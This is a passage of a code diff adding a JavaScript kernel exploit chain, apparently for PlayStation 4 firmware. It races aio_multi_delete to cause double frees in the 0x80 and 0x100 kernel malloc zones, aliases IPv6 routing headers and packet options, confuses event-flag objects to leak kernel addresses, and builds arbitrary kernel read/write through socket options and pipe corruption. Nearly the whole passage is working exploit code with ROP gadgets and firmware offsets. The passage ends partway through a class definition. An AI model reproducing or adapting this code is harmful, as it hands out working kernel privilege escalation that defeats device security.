+    size = (len + 1) << 3;
+
+    buf[0] = 0;
+    buf[1] = len;
+    buf[2] = 0;
+    buf[3] = len >> 1;
+
+    return size;
+}
+
+function spawn_thread(thread) {
+    const ctx = new Buffer(context_size);
+    const pthread = new Pointer();
+    pthread.ctx = ctx;
+    // pivot the pthread's stack pointer to our stack
+    ctx.write64(0x38, thread.stack_addr);
+    ctx.write64(0x80, thread.get_gadget('ret'));
+
+    call_nze(
+        'pthread_create',
+        pthread.addr,
+        0,
+        chain.get_gadget('setcontext'),
+        ctx.addr,
+    );
+
+    return pthread;
+}
+
+// EXPLOIT STAGES IMPLEMENTATION
+
+// FUNCTIONS FOR STAGE: 0x80 MALLOC ZONE DOUBLE FREE
+
+function make_aliased_rthdrs(sds) {
+    const marker_offset = 4;
+    const size = 0x80;
+    const buf = new Buffer(size);
+    const rsize = build_rthdr(buf, size);
+
+    for (let loop = 0; loop < num_alias; loop++) {
+        for (let i = 0; i < num_sds; i++) {
+            buf.write32(marker_offset, i);
+            set_rthdr(sds[i], buf, rsize);
+        }
+
+        for (let i = 0; i < sds.length; i++) {
+            get_rthdr(sds[i], buf);
+            const marker = buf.read32(marker_offset);
+            if (marker !== i) {
+                log(`aliased rthdrs at attempt: ${loop}`);
+                const pair = [sds[i], sds[marker]];
+                log(`found pair: ${pair}`);
+                sds.splice(marker, 1);
+                sds.splice(i, 1);
+                free_rthdrs(sds);
+                sds.push(new_socket(), new_socket());
+                return pair;
+            }
+        }
+    }
+    die(`failed to make aliased rthdrs. size: ${hex(size)}`);
+}
+
+// summary of the bug at aio_multi_delete():
+//
+// void
+// free_queue_entry(struct aio_entry *reqs2)
+// {
+//     if (reqs2->ar2_spinfo != NULL) {
+//         printf(
+//             "[0]%s() line=%d Warning !! split info is here\n",
+//             __func__,
+//             __LINE__
+//         );
+//     }
+//     if (reqs2->ar2_file != NULL) {
+//         // we can potentially delay .fo_close()
+//         fdrop(reqs2->ar2_file, curthread);
+//         reqs2->ar2_file = NULL;
+//     }
+//     free(reqs2, M_AIO_REQS2);
+// }
+//
+// int
+// _aio_multi_delete(
+//     struct thread *td,
+//     SceKernelAioSubmitId ids[],
+//     u_int num_ids,
+//     int sce_errors[])
+// {
+//     // ...
+//     struct aio_object *obj = id_rlock(id_tbl, id, 0x160, id_entry);
+//     // ...
+//     u_int rem_ids = obj->ao_rem_ids;
+//     if (rem_ids != 1) {
+//         // BUG: wlock not acquired on this path
+//         obj->ao_rem_ids = --rem_ids;
+//         // ...
+//         free_queue_entry(obj->ao_entries[req_idx]);
+//         // the race can crash because of a NULL dereference since this path
+//         // doesn't check if the array slot is NULL so we delay
+//         // free_queue_entry()
+//         obj->ao_entries[req_idx] = NULL;
+//     } else {
+//         // ...
+//     }
+//     // ...
+// }
+function race_one(request_addr, tcp_sd, barrier, racer, sds) {
+    const sce_errs = new View4([-1, -1]);
+    const thr_mask = new Word(1 << main_core);
+
+    const thr = racer;
+    thr.push_syscall(
+        'cpuset_setaffinity',
+        CPU_LEVEL_WHICH,
+        CPU_WHICH_TID,
+        -1,
+        8,
+        thr_mask.addr,
+    );
+    thr.push_syscall('rtprio_thread', RTP_SET, 0, rtprio.addr);
+    thr.push_gadget('pop rax; ret');
+    thr.push_value(1);
+    thr.push_get_retval();
+    thr.push_call('pthread_barrier_wait', barrier.addr);
+    thr.push_syscall(
+        'aio_multi_delete',
+        request_addr,
+        1,
+        sce_errs.addr_at(1),
+    );
+    thr.push_call('pthread_exit', 0);
+
+    const pthr = spawn_thread(thr);
+    const thr_tid = pthr.read32(0);
+
+    // pthread barrier implementation:
+    //
+    // given a barrier that needs N threads for it to be unlocked, a thread
+    // will sleep if it waits on the barrier and N - 1 threads havent't arrived
+    // before
+    //
+    // if there were already N - 1 threads then that thread (last waiter) won't
+    // sleep and it will send out a wake-up call to the waiting threads
+    //
+    // since the ps4's cores only have 1 hardware thread each, we can pin 2
+    // threads on the same core and control the interleaving of their
+    // executions via controlled context switches
+
+    // wait for the worker to enter the barrier and sleep
+    while (thr.retval_int === 0) {
+        sys_void('sched_yield');
+    }
+
+    // enter the barrier as the last waiter
+    chain.push_call('pthread_barrier_wait', barrier.addr);
+    // yield and hope the scheduler runs the worker next. the worker will then
+    // sleep at soclose() and hopefully we run next
+    chain.push_syscall('sched_yield');
+    // if we get here and the worker hasn't been reran then we can delay the
+    // worker's execution of soclose() indefinitely
+    chain.push_syscall('thr_suspend_ucontext', thr_tid);
+    chain.push_get_retval();
+    chain.push_get_errno();
+    chain.push_end();
+    chain.run();
+    chain.reset();
+
+    const main_res = chain.retval_int;
+    log(`suspend ${thr_tid}: ${main_res} errno: ${chain.errno}`);
+
+    if (main_res === -1) {
+        call_nze('pthread_join', pthr, 0);
+        log();
+        return null;
+    }
+
+    let won_race = false;
+    try {
+        const poll_err = new View4(1);
+        aio_multi_poll(request_addr, 1, poll_err.addr);
+        log(`poll: ${hex(poll_err[0])}`);
+
+        const info_buf = new View1(size_tcp_info);
+        const info_size = gsockopt(tcp_sd, IPPROTO_TCP, TCP_INFO, info_buf);
+        log(`info size: ${hex(info_size)}`);
+
+        if (info_size !== size_tcp_info) {
+            die(`info size isn't ${size_tcp_info}: ${info_size}`);
+        }
+
+        const tcp_state = info_buf[0];
+        log(`tcp_state: ${tcp_state}`);
+
+        const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+        if (poll_err[0] !== SCE_KERNEL_ERROR_ESRCH
+            && tcp_state !== TCPS_ESTABLISHED
+        ) {
+            // PANIC: double free on the 0x80 malloc zone. important kernel
+            // data may alias
+            aio_multi_delete(request_addr, 1, sce_errs.addr);
+            won_race = true;
+        }
+    } finally {
+        log('resume thread\n');
+        sysi('thr_resume_ucontext', thr_tid);
+        call_nze('pthread_join', pthr, 0);
+    }
+
+    if (won_race) {
+        log(`race errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+        // if the code has no bugs then this isn't possible but we keep the
+        // check for easier debugging
+        if (sce_errs[0] !== sce_errs[1]) {
+            log('ERROR: bad won_race');
+            die('ERROR: bad won_race');
+        }
+        // RESTORE: double freed memory has been reclaimed with harmless data
+        // PANIC: 0x80 malloc zone pointers aliased
+        return make_aliased_rthdrs(sds);
+    }
+
+    return null;
+}
+
+function double_free_reqs2(sds) {
+    function swap_bytes(x, byte_length) {
+        let res = 0;
+        for (let i = 0; i < byte_length; i++) {
+            res |= ((x >> 8 * i) & 0xff) << 8 * (byte_length - i - 1);
+        }
+
+        return res >>> 0;
+    }
+
+    function htons(x) {
+        return swap_bytes(x, 2);
+    }
+
+    function htonl(x) {
+        return swap_bytes(x, 4);
+    }
+
+    const server_addr = new Buffer(16);
+    // sockaddr_in.sin_family
+    server_addr[1] = AF_INET;
+    // sockaddr_in.sin_port
+    server_addr.write16(2, htons(5050));
+    // sockaddr_in.sin_addr = 127.0.0.1
+    server_addr.write32(4, htonl(0x7f000001));
+
+    const racer = new Chain();
+    const barrier = new Long();
+    call_nze('pthread_barrier_init', barrier.addr, 0, 2);
+
+    const num_reqs = 3;
+    const which_req = num_reqs - 1;
+    const reqs1 = make_reqs1(num_reqs);
+    const reqs1_p = reqs1.addr;
+    const aio_ids = new View4(num_reqs);
+    const aio_ids_p = aio_ids.addr;
+    const req_addr = aio_ids.addr_at(which_req);
+    const cmd = AIO_CMD_MULTI_READ;
+
+    const sd_listen = new_tcp_socket();
+    ssockopt(sd_listen, SOL_SOCKET, SO_REUSEADDR, new Word(1));
+
+    sysi('bind', sd_listen, server_addr.addr, server_addr.size);
+    sysi('listen', sd_listen, 1);
+
+    for (let i = 0; i < num_races; i++) {
+        const sd_client = new_tcp_socket();
+        sysi('connect', sd_client, server_addr.addr, server_addr.size);
+
+        const sd_conn = sysi('accept', sd_listen, 0, 0);
+        // force soclose() to sleep
+        ssockopt(sd_client, SOL_SOCKET, SO_LINGER, View4.of(1, 1));
+        reqs1.write32(0x20 + which_req*0x28, sd_client);
+
+        aio_submit_cmd(cmd, reqs1_p, num_reqs, aio_ids_p);
+        aio_multi_cancel(aio_ids_p, num_reqs);
+        aio_multi_poll(aio_ids_p, num_reqs);
+
+        // drop the reference so that aio_multi_delete() will trigger _fdrop()
+        close(sd_client);
+
+        const res = race_one(req_addr, sd_conn, barrier, racer, sds);
+        racer.reset();
+
+        // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
+        // twice. this will leave one request undeleted
+        aio_multi_delete(aio_ids_p, num_reqs);
+        close(sd_conn);
+
+        if (res !== null) {
+            log(`won race at attempt: ${i}`);
+            close(sd_listen);
+            call_nze('pthread_barrier_destroy', barrier.addr);
+            return res;
+        }
+    }
+
+    die('failed aio double free');
+}
+
+// FUNCTIONS FOR STAGE: LEAK 0x100 MALLOC ZONE ADDRESS
+
+function new_evf(flags) {
+    const name = cstr('');
+    // int evf_create(char *name, uint32_t attributes, uint64_t flags)
+    return sysi('evf_create', name.addr, 0, flags);
+}
+
+function set_evf_flags(id, flags) {
+    sysi('evf_clear', id, 0);
+    sysi('evf_set', id, flags);
+}
+
+function free_evf(id) {
+    sysi('evf_delete', id);
+}
+
+function verify_reqs2(buf, offset) {
+    // reqs2.ar2_cmd
+    if (buf.read32(offset) !== AIO_CMD_WRITE) {
+        return false;
+    }
+
+    // heap addresses are prefixed with 0xffff_xxxx
+    // xxxx is randomized on boot
+    //
+    // heap_prefixes is a array of randomized prefix bits from a group of heap
+    // address candidates. if the candidates truly are from the heap, they must
+    // share a common prefix
+    const heap_prefixes = [];
+
+    // check if offsets 0x10 to 0x20 look like a kernel heap address
+    for (let i = 0x10; i <= 0x20; i += 8) {
+        if (buf.read16(offset + i + 6) !== 0xffff) {
+            return false;
+        }
+        heap_prefixes.push(buf.read16(offset + i + 4));
+    }
+
+    // check reqs2.ar2_result.state
+    // state is actually a 32-bit value but the allocated memory was
+    // initialized with zeros. all padding bytes must be 0 then
+    let state = buf.read32(offset + 0x38);
+    if (!(0 < state && state <= 4) || buf.read32(offset + 0x38 + 4) !== 0) {
+        return false;
+    }
+
+    // reqs2.ar2_file must be NULL since we passed a bad file descriptor to
+    // aio_submit_cmd()
+    if (!buf.read64(offset + 0x40).eq(0)) {
+        return false;
+    }
+
+    // check if offsets 0x48 to 0x50 look like a kernel address
+    for (let i = 0x48; i <= 0x50; i += 8) {
+        if (buf.read16(offset + i + 6) === 0xffff) {
+            // don't push kernel ELF addresses
+            if (buf.read16(offset + i + 4) !== 0xffff) {
+                heap_prefixes.push(buf.read16(offset + i + 4));
+            }
+        // offset 0x48 can be NULL
+        } else if (i === 0x50 || !buf.read64(offset + i).eq(0)) {
+            return false;
+        }
+    }
+
+    return heap_prefixes.every((e, i, a) => e === a[0]);
+}
+
+function leak_kernel_addrs(sd_pair) {
+    close(sd_pair[1]);
+    const sd = sd_pair[0];
+    const buf = new Buffer(0x80 * leak_len);
+
+    // type confuse a struct evf with a struct ip6_rthdr. the flags of the evf
+    // must be set to >= 0xf00 in order to fully leak the contents of the rthdr
+    log('confuse evf with rthdr');
+    let evf = null;
+    for (let i = 0; i < num_alias; i++) {
+        const evfs = [];
+        for (let i = 0; i < num_handles; i++) {
+            evfs.push(new_evf(0xf00 | i << 16));
+        }
+
+        get_rthdr(sd, buf, 0x80);
+        // for simplicity, we'll assume i < 2**16
+        const flags32 = buf.read32(0);
+        evf = evfs[flags32 >>> 16];
+
+        set_evf_flags(evf, flags32 | 1);
+        get_rthdr(sd, buf, 0x80);
+
+        if (buf.read32(0) === flags32 | 1) {
+            evfs.splice(flags32 >> 16, 1);
+        } else {
+            evf = null;
+        }
+
+        for (const evf of evfs) {
+            free_evf(evf);
+        }
+
+        if (evf !== null) {
+            log(`confused rthdr and evf at attempt: ${i}`);
+            break;
+        }
+    }
+
+    if (evf === null) {
+        die('failed to confuse evf and rthdr');
+    }
+
+    set_evf_flags(evf, 0xff << 8);
+    get_rthdr(sd, buf, 0x80);
+
+    // fields we use from evf (number before the field is the offset in hex):
+    // struct evf:
+    //     0 u64 flags
+    //     28 struct cv cv
+    //     38 TAILQ_HEAD(struct evf_waiter) waiters
+
+    // evf.cv.cv_description = "evf cv"
+    // string is located at the kernel's mapped ELF file
+    const kernel_addr = buf.read64(0x28);
+    log(`"evf cv" string addr: ${kernel_addr}`);
+    // because of TAILQ_INIT(), we have:
+    //
+    // evf.waiters.tqh_last == &evf.waiters.tqh_first
+    //
+    // we now know the address of the kernel buffer we are leaking
+    const kbuf_addr = buf.read64(0x40).sub(0x38);
+    log(`kernel buffer addr: ${kbuf_addr}`);
+
+    // 0x80 < num_elems * sizeof(SceKernelAioRWRequest) <= 0x100
+    // allocate reqs1 arrays at 0x100 malloc zone
+    const num_elems = 6;
+    // use reqs1 to fake a aio_info. set .ai_cred (offset 0x10) to offset 4 of
+    // the reqs2 so crfree(ai_cred) will harmlessly decrement the .ar2_ticket
+    // field
+    const ucred = kbuf_addr.add(4);
+
+    const leak_reqs = make_reqs1(num_elems);
+    const leak_reqs_p = leak_reqs.addr;
+    leak_reqs.write64(0x10, ucred);
+
+    const leak_ids_len = num_handles * num_elems;
+    const leak_ids = new View4(leak_ids_len);
+    const leak_ids_p = leak_ids.addr;
+
+    log('find aio_entry');
+    let reqs2_off = null;
+    loop: for (let i = 0; i < num_leaks; i++) {
+        get_rthdr(sd, buf);
+
+        spray_aio(
+            num_handles,
+            leak_reqs_p,
+            num_elems,
+            leak_ids_p,
+            true,
+            AIO_CMD_WRITE,
+        );
+
+        get_rthdr(sd, buf);
+        for (let off = 0x80; off < buf.length; off += 0x80) {
+            if (verify_reqs2(buf, off)) {
+                reqs2_off = off;
+                log(`found reqs2 at attempt: ${i}`);
+                break loop;
+            }
+        }
+
+        free_aios(leak_ids_p, leak_ids_len);
+    }
+    if (reqs2_off === null) {
+        die('could not leak a reqs2');
+    }
+    log(`reqs2 offset: ${hex(reqs2_off)}`);
+
+    get_rthdr(sd, buf);
+    const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+    log('leaked aio_entry:');
+    hexdump(reqs2);
+
+    const reqs1_addr = new Long(reqs2.read64(0x10));
+    log(`reqs1_addr: ${reqs1_addr}`);
+    reqs1_addr.lo &= -0x100;
+    log(`reqs1_addr: ${reqs1_addr}`);
+
+    log('searching target_id');
+    let target_id = null;
+    let to_cancel_p = null;
+    let to_cancel_len = null;
+    for (let i = 0; i < leak_ids_len; i += num_elems) {
+        aio_multi_cancel(leak_ids_p.add(i << 2), num_elems);
+
+        get_rthdr(sd, buf);
+        const state = buf.read32(reqs2_off + 0x38);
+        if (state === AIO_STATE_ABORTED) {
+            log(`found target_id at batch: ${i / num_elems}`);
+
+            target_id = new Word(leak_ids[i]);
+            leak_ids[i] = 0;
+            log(`target_id: ${hex(target_id)}`);
+
+            const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+            log('leaked aio_entry:');
+            hexdump(reqs2);
+
+            const start = i + num_elems;
+            to_cancel_p = leak_ids.addr_at(start);
+            to_cancel_len = leak_ids_len - start;
+            break;
+        }
+    }
+    if (target_id === null) {
+        die('target_id not found');
+    }
+
+    cancel_aios(to_cancel_p, to_cancel_len);
+    free_aios2(leak_ids_p, leak_ids_len);
+
+    return [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf];
+}
+
+// FUNCTIONS FOR STAGE: 0x100 MALLOC ZONE DOUBLE FREE
+
+function make_aliased_pktopts(sds) {
+    const tclass = new Word();
+    for (let loop = 0; loop < num_alias; loop++) {
+        for (let i = 0; i < num_sds; i++) {
+            tclass[0] = i;
+            ssockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
+        }
+
+        for (let i = 0; i < sds.length; i++) {
+            gsockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
+            const marker = tclass[0];
+            if (marker !== i) {
+                log(`aliased pktopts at attempt: ${loop}`);
+                const pair = [sds[i], sds[marker]];
+                log(`found pair: ${pair}`);
+                sds.splice(marker, 1);
+                sds.splice(i, 1);
+                // add pktopts to the new sockets now while new allocs can't
+                // use the double freed memory
+                for (let i = 0; i < 2; i++) {
+                    const sd = new_socket();
+                    ssockopt(sd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+                    sds.push(sd);
+                }
+
+                return pair;
+            }
+        }
+
+        for (let i = 0; i < num_sds; i++) {
+            setsockopt(sds[i], IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0, 0);
+        }
+    }
+    die('failed to make aliased pktopts');
+}
+
+function double_free_reqs1(
+    reqs1_addr, kbuf_addr, target_id, evf, sd, sds,
+) {
+    const max_leak_len = (0xff + 1) << 3;
+    const buf = new Buffer(max_leak_len);
+
+    const num_elems = max_aio_ids;
+    const aio_reqs = make_reqs1(num_elems);
+    const aio_reqs_p = aio_reqs.addr;
+
+    const num_batches = 2;
+    const aio_ids_len = num_batches * num_elems;
+    const aio_ids = new View4(aio_ids_len);
+    const aio_ids_p = aio_ids.addr;
+
+    log('start overwrite rthdr with AIO queue entry loop');
+    let aio_not_found = true;
+    free_evf(evf);
+    for (let i = 0; i < num_clobbers; i++) {
+        spray_aio(num_batches, aio_reqs_p, num_elems, aio_ids_p);
+
+        if (get_rthdr(sd, buf) === 8 && buf.read32(0) === AIO_CMD_READ) {
+            log(`aliased at attempt: ${i}`);
+            aio_not_found = false;
+            cancel_aios(aio_ids_p, aio_ids_len);
+            break;
+        }
+
+        free_aios(aio_ids_p, aio_ids_len);
+    }
+    if (aio_not_found) {
+        die('failed to overwrite rthdr');
+    }
+
+    const reqs2 = new Buffer(0x80);
+    const rsize = build_rthdr(reqs2, reqs2.size);
+    // .ar2_ticket
+    reqs2.write32(4, 5);
+    // .ar2_info
+    reqs2.write64(0x18, reqs1_addr);
+    // craft a aio_batch using the end portion of the buffer
+    const reqs3_off = 0x28;
+    // .ar2_batch
+    reqs2.write64(0x20, kbuf_addr.add(reqs3_off));
+
+    // [.ar3_num_reqs, .ar3_reqs_left] aliases .ar2_spinfo
+    // safe since free_queue_entry() doesn't deref the pointer
+    reqs2.write32(reqs3_off, 1);
+    reqs2.write32(reqs3_off + 4, 0);
+    // [.ar3_state, .ar3_done] aliases .ar2_result.returnValue
+    reqs2.write32(reqs3_off + 8, AIO_STATE_COMPLETE);
+    reqs2[reqs3_off + 0xc] = 0;
+    // .ar3_lock aliases .ar2_qentry (rest of the buffer is padding)
+    // safe since the entry already got dequeued
+    //
+    // .ar3_lock.lock_object.lo_flags = (
+    //     LO_SLEEPABLE | LO_UPGRADABLE
+    //     | LO_RECURSABLE | LO_DUPOK | LO_WITNESS
+    //     | 6 << LO_CLASSSHIFT
+    //     | LO_INITIALIZED
+    // )
+    reqs2.write32(reqs3_off + 0x28, 0x67b0000);
+    // .ar3_lock.lk_lock = LK_UNLOCKED
+    reqs2.write64(reqs3_off + 0x38, 1);
+
+    const states = new View4(num_elems);
+    const states_p = states.addr;
+    const addr_cache = [aio_ids_p];
+    for (let i = 1; i < num_batches; i++) {
+        addr_cache.push(aio_ids_p.add((i * num_elems) << 2));
+    }
+
+    log('start overwrite AIO queue entry with rthdr loop');
+    let req_id = null;
+    close(sd);
+    sd = null;
+    loop: for (let i = 0; i < num_alias; i++) {
+        for (const sd of sds) {
+            set_rthdr(sd, reqs2, rsize);
+        }
+
+        for (let batch = 0; batch < addr_cache.length; batch++) {
+            states.fill(-1);
+            aio_multi_cancel(addr_cache[batch], num_elems, states_p);
+
+            const req_idx = states.indexOf(AIO_STATE_COMPLETE);
+            if (req_idx !== -1) {
+                log(`req_idx: ${req_idx}`);
+                log(`found req_id at batch: ${batch}`);
+                log(`states: ${[...states].map(e => hex(e))}`);
+                log(`states[${req_idx}]: ${hex(states[req_idx])}`);
+                log(`aliased at attempt: ${i}`);
+
+                const aio_idx = batch*num_elems + req_idx;
+                req_id = new Word(aio_ids[aio_idx]);
+                log(`req_id: ${hex(req_id)}`);
+                aio_ids[aio_idx] = 0;
+
+                // set .ar3_done to 1
+                poll_aio(req_id, states);
+                log(`states[${req_idx}]: ${hex(states[0])}`);
+                for (let i = 0; i < num_sds; i++) {
+                    const sd2 = sds[i];
+                    get_rthdr(sd2, reqs2);
+                    const done = reqs2[reqs3_off + 0xc];
+                    if (done) {
+                        hexdump(reqs2);
+                        sd = sd2;
+                        sds.splice(i, 1);
+                        free_rthdrs(sds);
+                        sds.push(new_socket());
+                        break;
+                    }
+                }
+                if (sd === null) {
+                    die("can't find sd that overwrote AIO queue entry");
+                }
+                log(`sd: ${sd}`);
+
+                break loop;
+            }
+        }
+    }
+    if (req_id === null) {
+        die('failed to overwrite AIO queue entry');
+    }
+    free_aios2(aio_ids_p, aio_ids_len);
+
+    // enable deletion of target_id
+    poll_aio(target_id, states);
+    log(`target's state: ${hex(states[0])}`);
+
+    const sce_errs = new View4([-1, -1]);
+    const target_ids = new View4([req_id, target_id]);
+    // PANIC: double free on the 0x100 malloc zone. important kernel data may
+    // alias
+    aio_multi_delete(target_ids.addr, 2, sce_errs.addr);
+
+    // we reclaim first since the sanity checking here is longer which makes it
+    // more likely that we have another process claim the memory
+    try {
+        // RESTORE: double freed memory has been reclaimed with harmless data
+        // PANIC: 0x100 malloc zone pointers aliased
+        const sd_pair = make_aliased_pktopts(sds);
+        return [sd_pair, sd];
+    } finally {
+        log(`delete errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+
+        states[0] = -1;
+        states[1] = -1;
+        poll_aio(target_ids, states);
+        log(`target states: ${hex(states[0])}, ${hex(states[1])}`);
+
+        const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+        let success = true;
+        if (states[0] !== SCE_KERNEL_ERROR_ESRCH) {
+            log('ERROR: bad delete of corrupt AIO request');
+            success = false;
+        }
+        if (sce_errs[0] !== 0 || sce_errs[0] !== sce_errs[1]) {
+            log('ERROR: bad delete of ID pair');
+            success = false;
+        }
+
+        if (!success) {
+            die('ERROR: double free on a 0x100 malloc zone failed');
+        }
+    }
+}
+
+// FUNCTIONS FOR STAGE: MAKE ARBITRARY KERNEL READ/WRITE
+
+// k100_addr is double freed 0x100 malloc zone address
+// dirty_sd is the socket whose rthdr pointer is corrupt
+// kernel_addr is the address of the "evf cv" string
+function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
+    const psd = pktopts_sds[0];
+    const tclass = new Word();
+    const off_tclass = is_ps4 ? 0xb0 : 0xc0;
+
+    const pktopts = new Buffer(0x100);
+    const rsize = build_rthdr(pktopts, pktopts.size);
+    const pktinfo_p = k100_addr.add(0x10);
+    // pktopts.ip6po_pktinfo = &pktopts.ip6po_pktinfo
+    pktopts.write64(0x10, pktinfo_p);
+
+    log('overwrite main pktopts');
+    let reclaim_sd = null;
+    close(pktopts_sds[1]);
+    for (let i = 0; i < num_alias; i++) {
+        for (let i = 0; i < num_sds; i++) {
+            // if a socket doesn't have a pktopts, setting the rthdr will make
+            // one. the new pktopts might reuse the memory instead of the
+            // rthdr. make sure the sockets already have a pktopts before
+            pktopts.write32(off_tclass, 0x4141 | i << 16);
+            set_rthdr(sds[i], pktopts, rsize);
+        }
+
+        gsockopt(psd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+        const marker = tclass[0];
+        if ((marker & 0xffff) === 0x4141) {
+            log(`found reclaim sd at attempt: ${i}`);
+            const idx = marker >>> 16;
+            reclaim_sd = sds[idx];
+            sds.splice(idx, 1);
+            break;
+        }
+    }
+    if (reclaim_sd === null) {
+        die('failed to overwrite main pktopts');
+    }
+
+    const pktinfo = new Buffer(0x14);
+    pktinfo.write64(0, pktinfo_p);
+    const nhop = new Word();
+    const nhop_p = nhop.addr;
+    const read_buf = new Buffer(8);
+    const read_buf_p = read_buf.addr;
+    function kread64(addr) {
+        const len = 8;
+        let offset = 0;
+        while (offset < len) {
+            // pktopts.ip6po_nhinfo = addr + offset
+            pktinfo.write64(8, addr.add(offset));
+            nhop[0] = len - offset;
+
+            ssockopt(psd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+            sysi(
+                'getsockopt',
+                psd, IPPROTO_IPV6, IPV6_NEXTHOP,
+                read_buf_p.add(offset), nhop_p,
+            );
+
+            const n = nhop[0];
+            if (n === 0) {
+                read_buf[offset] = 0;
+                offset += 1;
+            } else {
+                offset += n;
+            }
+        }
+        return read_buf.read64(0);
+    }
+
+    log(`kread64(&"evf cv"): ${kread64(kernel_addr)}`);
+    const kstr = jstr(read_buf);
+    log(`*(&"evf cv"): ${kstr}`);
+    if (kstr !== 'evf cv') {
+        die('test read of &"evf cv" failed');
+    }
+
+    // TODO FW dependent parts! assume ps4 9.000 for now
+    //TODO: Needs porting to 9.00
+    const off_kstr = 0x7edcff;
+    const kbase = kernel_addr.sub(off_kstr);
+    log(`kernel base: ${kbase}`);
+
+    log('\nmaking arbitrary kernel read/write');
+    const cpuid = 7 - main_core;
+    const off_cpuid_to_pcpu = 0x228e6b0;
+    const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8);
+    log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
+    const pcpu = kread64(pcpu_p);
+    log(`pcpu: ${pcpu}`);
+    log(`cpuid: ${kread64(pcpu.add(0x30)).hi}`);
+    // __pcpu[cpuid].pc_curthread
+    const td = kread64(pcpu);
+    log(`td: ${td}`);
+
+    const off_td_proc = 8;
+    const proc = kread64(td.add(off_td_proc));
+    log(`proc: ${proc}`);
+    const pid = sysi('getpid');
+    log(`our pid: ${pid}`);
+    const pid2 = kread64(proc.add(0xb0)).lo;
+    log(`suspected proc pid: ${pid2}`);
+    if (pid2 !== pid) {
+        die('process not found');
+    }
+
+    const off_p_fd = 0x48;
+    const p_fd = kread64(proc.add(off_p_fd));
+    log(`proc.p_fd: ${p_fd}`);
+    // curthread->td_proc->p_fd->fd_ofiles
+    const ofiles = kread64(p_fd);
+    log(`ofiles: ${ofiles}`);
+
+    const off_p_ucred = 0x40;
+    const p_ucred = kread64(proc.add(off_p_ucred));
+    log(`p_ucred ${p_ucred}`);
+
+    const pipes = new View4(2);
+    sysi('pipe', pipes.addr);
+    const pipe_file = kread64(ofiles.add(pipes[0] * 8));
+    log(`pipe file: ${pipe_file}`);
+    // ofiles[pipe_fd].f_data
+    const kpipe = kread64(pipe_file);
+    log(`pipe pointer: ${kpipe}`);
+
+    const pipe_save = new Buffer(0x18); // sizeof struct pipebuf
+    for (let off = 0; off < pipe_save.size; off += 8) {
+        pipe_save.write64(off, kread64(kpipe.add(off)));
+    }
+
+    const main_sd = psd;
+    const worker_sd = dirty_sd;
+
+    const main_file = kread64(ofiles.add(main_sd * 8));
+    log(`main sock file: ${main_file}`);
+    // ofiles[sd].f_data
+    const main_sock = kread64(main_file);
+    log(`main sock pointer: ${main_sock}`);
+    // socket.so_pcb (struct inpcb *)
+    const m_pcb = kread64(main_sock.add(0x18));
+    log(`main sock pcb: ${m_pcb}`);
+    // inpcb.in6p_outputopts
+    const m_pktopts = kread64(m_pcb.add(0x118));
+    log(`main pktopts: ${m_pktopts}`);
+    log(`0x100 malloc zone pointer: ${k100_addr}`);
+
+    if (m_pktopts.ne(k100_addr)) {
+        die('main pktopts pointer != leaked pktopts pointer');
+    }
+
+    // ofiles[sd].f_data
+    const reclaim_sock = kread64(kread64(ofiles.add(reclaim_sd * 8)));
+    log(`reclaim sock pointer: ${reclaim_sock}`);
+    // socket.so_pcb (struct inpcb *)
+    const r_pcb = kread64(reclaim_sock.add(0x18));
+    log(`reclaim sock pcb: ${r_pcb}`);
+    // inpcb.in6p_outputopts
+    const r_pktopts = kread64(r_pcb.add(0x118));
+    log(`reclaim pktopts: ${r_pktopts}`);
+
+    // ofiles[sd].f_data
+    const worker_sock = kread64(kread64(ofiles.add(worker_sd * 8)));
+    log(`worker sock pointer: ${worker_sock}`);
+    // socket.so_pcb (struct inpcb *)
+    const w_pcb = kread64(worker_sock.add(0x18));
+    log(`worker sock pcb: ${w_pcb}`);
+    // inpcb.in6p_outputopts
+    const w_pktopts = kread64(w_pcb.add(0x118));
+    log(`worker pktopts: ${w_pktopts}`);
+
+    // get restricted read/write with pktopts pair
+    // main_pktopts.ip6po_pktinfo = &worker_pktopts.ip6po_pktinfo
+    const w_pktinfo = w_pktopts.add(0x10);
+    pktinfo.write64(0, w_pktinfo);
+    pktinfo.write64(8, 0); // clear .ip6po_nexthop
+    ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+
+    pktinfo.write64(0, kernel_addr);
+    ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+    gsockopt(worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+    const kstr2 = jstr(pktinfo);
+    log(`*(&"evf cv"): ${kstr2}`);
+    if (kstr2 !== 'evf cv') {
+        die('pktopts read failed');
+    }
+    log('achieved restricted kernel read/write');
+
+    // in6_pktinfo.ipi6_ifindex must be 0 (or a valid interface index) when
+    // using pktopts write. we can safely modify a pipe even with this limit so
+    // we corrupt that instead for arbitrary read/write. pipe.pipe_map will be
+    // clobbered with zeros but that's okay
+    class KernelMemory {
+        constructor(main_sd, worker_sd, pipes, pipe_addr) {
+            this.main_sd = main_sd;
+            this.worker_sd = worker_sd;
+            this.rpipe = pipes[0];
+            this.wpipe = pipes[1];
+            this.pipe_addr = pipe_addr; // &pipe.pipe_buf
+            this.pipe_addr2 = pipe_addr.add(0x10); // &pipe.pipe_buf.buffer
+            this.rw_buf = new Buffer(0x14);
+            this.addr_buf = new Buffer(0x14);
+            this.data_buf = new Buffer(0x14);
+            this.data_buf.write32(0xc, 0x40000000);
+        }
+
+        _verify_len(len) {
+            if (!(Number.isInteger(len) && (0 <= len <= 0xffffffff))) {
+                throw TypeError('len not a 32-bit unsigned integer');
+            }
+        }
